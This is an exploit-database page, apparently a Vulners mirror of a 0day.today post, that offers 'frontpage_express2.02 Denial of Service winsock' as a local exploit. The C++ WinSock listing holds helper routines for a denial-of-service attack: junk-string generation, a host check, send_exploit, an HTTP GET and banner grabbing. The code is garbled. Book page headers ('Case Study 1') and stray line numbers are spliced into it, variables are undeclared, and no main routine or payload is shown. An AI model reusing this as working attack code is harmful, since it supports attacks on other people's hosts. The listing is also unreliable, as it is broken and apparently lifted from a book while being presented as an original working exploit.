Lucene search
K

frontpage_express2.02 Denial of Service winsock

🗓️ 01 Feb 2012 00:00:00Reported by TrOoNType 
zdt
 zdt
🔗 0day.today👁 28 Views

frontpage_express2.02 Denial of Service winsock. Locally exploits WinDows XP sp 2 using frontpage_express2.02. Generates denial of service via WinSock

Code
# Title :frontpage_express2.02 Denial of Service winsock
# Author :TrOoN
# E-mail : [email protected]  | www.facebook.com/fysl.fyslm
# Home : city 617 logts  : Draria . algeria
# Web Site : www.1337day.com       |
# platform :  WinDows XP sp 2
# Type : local exploit /SHELL CODE  /ETc...
#Download link : http://www.jetelecharge.com/Internet/271.php

# waRn :  frontpage_express2.02 no frontpage
 ~~

######################################## Begin ##################################
#include <winsock2.h>
#pragma comment(lib,"ws2_32.lib")
#define STRING_MAX 65536
#define MAX 8388608
char *junk(char *input, int repeat)
{
int maxSize;
char *junkString = new char[STRING_MAX];
strcpy(junkString, "");

if( repeat < STRING_MAX && repeat > 0 && strlen(input) != 0
&& strlen(input) <= (STRING_MAX - 1))
{
maxSize = (STRING_MAX - 1)/strlen(input);
for(int count = 0; count < repeat
&& count < maxSize; count++)
{
strcat(junkString, input);
}
}
else
{
23 printf("Invalid Perameters! \n");
strcpy(junkString,"--FAILURE--");
 : }
delete [ ] junkString;
return (junkString);
}
bool is_up(char *targetip, int port)
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent target_ptr;
struct sockaddr_in sock;
SOCKET MySock;
wVersionRequested = MAKEWORD(2, 2);
3if (WSAStartup(wVersionRequested, &wsaData) < 0)
{
printf("############ERROR!####################\n");
printf("Your ws2_32.dll is too old to use this
application. \n");
printf("Go to microsofts web site to download the most
recent \n");
42 printf("version of ws2_32.dll.
\n");

Frontpage Denial of Service  WinSock • Case Study 1 145
WSACleanup();
return (FALSE);
}
MySock = socket(AF_INET, SOCK_STREAM, 0);
if(MySock==INVALID_SOCKET)
{
printf("Socket error!\r\n");
closesocket(MySock);
WSACleanup();
return (FALSE);
}
if ((pTarget = gethostbyname(targetip)) == NULL)
{
printf("\nResolve of %s failed, please try again.\n",
targetip);

closesocket(MySock);
WSACleanup();
return (FALSE);
 }
 memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);
if ( (connect(MySock, (struct sockaddr *)&sock, sizeof (sock) )))
{
 closesocket(MySock);
WSACleanup();

return (FALSE);
 }
 else
{
closesocket(MySock);
WSACleanup();
return (TRUE);
}
}
 bool is_string_in(char *needle, char *haystack)
 {
 char *loc = strstr(haystack, needle);
if( loc != NULL )
{
return(TRUE);
 }
 else
{
return(FALSE);
 }
 }
char *replace_string(char *new_str, char *old_str, char *whole_str)
 Case Study 1 • Frontpage Denial of Service Utilizing WinSock
{
 int len = strlen(old_str);
char buffer[MAX] = "";
char *loc = strstr(whole_str, old_str);
 if(loc != NULL)
 {
 strncpy(buffer, whole_str, loc-whole_str );
strcat(buffer, new_str);
 strcat(buffer, loc + (strlen(old_str)));
 strcpy(whole_str, buffer);
 }
 return whole_str;
 }
 char *send_exploit(char *targetip, int port, char *send_string)
 {
 WSADATA wsaData;
 WORD wVersionRequested;
 struct hostent target_ptr;
 struct sockaddr_in sock;
 SOCKET MySock;
 wVersionRequested = MAKEWORD(2, 2);
 if (WSAStartup(wVersionRequested, &wsaData) != 0)
 {
 printf("############### ERROR!######################\n");
 printf("Your ws2_32.dll is too old to use this
application. \n");
 printf("Go to Microsoft's web site to download the most
recent \n");
 printf("version of ws2_32.dll.
\n");
 WSACleanup();
 exit(1);
 }
 MySock = socket(AF_INET, SOCK_STREAM, 0);
if(MySock==INVALID_SOCKET)
 {
 printf("Socket error!\r\n");

 closesocket(MySock);
WSACleanup();
 exit(1);
 }
if ((pTarget = gethostbyname(targetip)) == NULL)
 { printf("Resolve of %s failed, please try again.\n",
targetip);

 closesocket(MySock);
 WSACleanup();
 exit(1);
Frontpage Denial of Service Utilizing WinSock • Case Study 1 147
 }
 memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
 sock.sin_family = AF_INET;
 sock.sin_port = htons((USHORT)port);

 if ( (connect(MySock, (struct sockaddr *)&sock, sizeof (sock) )))
 {
 printf("Couldn't connect to host.\n");

 closesocket(MySock);
 WSACleanup();
 exit(1);
 }
 char sendfile[STRING_MAX];
 strcpy(sendfile, send_string);
 if (send(MySock, sendfile, sizeof(sendfile)-1, 0) == -1)
 {
 printf("Error sending Packet\r\n");
 closesocket(MySock);
 exit(1);
 }

 send(MySock, sendfile, sizeof(sendfile)-1, 0);
 char *recvString = new char[MAX];
 int nret;
nret = recv(MySock, recvString, MAX + 1, 0);
char *output= new char[nret];
strcpy(output, "");
if (nret == SOCKET_ERROR)
 {
 printf("Attempt to receive data FAILED. \n");
 }
 else
 {
 strncat(output, recvString, nret);
 delete [ ] recvString;
 }
 closesocket(MySock);
 WSACleanup();
 return (output);
 delete [ ] output;
 }
 char *get_http(char *targetip, int port, char *file)
 {
 WSADATA wsaData;
 WORD wVersionRequested;
 struct hostent target_ptr;
 struct sockaddr_in sock;
 SOCKET MySock;
 Case Study 1 • Frontpage Denial of Service Utilizing WinSock

 wVersionRequested = MAKEWORD(2, 2);
 if (WSAStartup(wVersionRequested, &wsaData) < 0)
 {
 printf("################# ERROR! ###################\n");
 printf("Your ws2_32.dll is too old to use this
application. \n");
 printf("Go to microsofts web site to download the most
recent \n");
195 printf("version of ws2_32.dll.
\n");

 WSACleanup();
 exit(1);
 }
 MySock = socket(AF_INET, SOCK_STREAM, 0);
 if(MySock==INVALID_SOCKET)
 {
 printf("Socket error!\r\n");

 closesocket(MySock);
 WSACleanup();
 exit(1);
 }
 if ((pTarget = gethostbyname(targetip)) == NULL)
 {
 printf("Resolve of %s failed, please try again.\n",
targetip);

 closesocket(MySock);
 WSACleanup();
 exit(1);
 }
 memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
 sock.sin_family = AF_INET;
 sock.sin_port = htons((USHORT)port);

 if ( (connect(MySock, (struct sockaddr *)&sock, sizeof (sock) )))
 {
 printf("Couldn't connect to host.\n");

 closesocket(MySock);
 WSACleanup();
 exit(1);
 }
 char sendfile[STRING_MAX];
 strcpy(sendfile, "GET ");
 strcat(sendfile, file);
 strcat(sendfile, " HTTP/1.1 \r\n" );
 strcat(sendfile, "Host: localhost\r\n\r\n");
Frontpage Denial of Service Utilizing WinSock • Case Study 1 149
 if (send(MySock, sendfile, sizeof(sendfile)-1, 0) == -1)
{
 printf("Error sending Packet\r\n");
 closesocket(MySock);
 WSACleanup();
 exit(1);
 }
 send(MySock, sendfile, sizeof(sendfile)-1, 0);

 char *recvString = new char[MAX];
 int nret;
 nret = recv(MySock, recvString, MAX + 1, 0);

 char *output= new char[nret];
 strcpy(output, "");
 if (nret == SOCKET_ERROR)
 {
 printf("Attempt to receive data FAILED. \n");
 }
 else
 {
strncat(output, recvString, nret);
 delete [ ] recvString;
 }
 closesocket(MySock);
 WSACleanup();
 return (output);
 delete [ ] output;
 }
 char *banner_grab(char *targetip, int port)
{
 char start_banner[] = "Server:";
 char end_banner[] = "\n";
 int start = 0;
 int end = 0;
 char* ret_banner = new char[MAX];
char* buffer = get_http(targetip, port, "/");

int len = strlen(buffer);

 char *pt = strstr(buffer, start_banner );

 if( pt != NULL )
 {
 start = pt - buffer;
 for(int x = start; x < len; x++)
 {
 if(_strnicmp( buffer + x, end_banner, 1 ) == 0)
 {
 Case Study 1 • Frontpage Denial of Service Utilizing WinSock
 end = x;
 x = len;
 }
 }
 strcpy(ret_banner, " ");
 strncat (ret_banner, buffer + start - 1 , (end - start));
 }
 else
 {
 strcpy(ret_banner, "EOF");
 }
 return (ret_banner);
 delete [ ] ret_banner;
 }
  ################### ENd ########################



#  0day.today [2018-02-05]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Feb 2012 00:00Current
7High risk
Vulners AI Score7
28